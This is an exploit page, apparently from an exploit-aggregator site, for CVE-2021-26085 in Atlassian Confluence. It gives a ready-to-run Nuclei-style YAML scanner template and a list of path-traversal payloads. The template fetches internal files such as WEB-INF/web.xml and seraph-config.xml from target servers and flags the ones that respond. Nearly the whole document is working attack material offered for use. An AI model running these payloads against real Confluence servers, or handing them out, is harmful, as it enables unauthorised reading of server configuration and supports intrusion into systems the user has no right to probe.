Share
## https://sploitus.com/exploit?id=B3FA9C79-AA38-5ADB-8E71-898783D49FB4
## CVE-2021-26085
Ideas from: https://github.com/ColdFusionX/CVE-2021-26085
Modifications from: my burp
https://twitter.com/zeroc00I
#### DISCLAIMER: List domains should end by "/"
### confluence-CVE-2021-26085.yaml
```
id: confluence-lfi-fuzz
info:
name: confluence-lfi-zeroc00I
author: zeroc00I
severity: high
reference: lfi
tags: lfi
attack: clusterbomb
requests:
- payloads:
path: confluence-lfi.txt
raw:
- |
GET /{{path}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: or
matchers:
- type: word
words:
- "groupId>org.springframework"
part: body
- type: word
words:
- "Generated by Maven"
part: body
- type: word
words:
- "security-config"
part: body
- type: word
words:
- 'com.atlassian.confluence.setup'
```
### confluence-lfi.txt
```
s/123cfx/_/;/WEB-INF/web.xml
s/123cfx/_/;/WEB-INF/classes/seraph-config.xml
s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties
s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml
```
## Running Demo
![](confluencetests.png)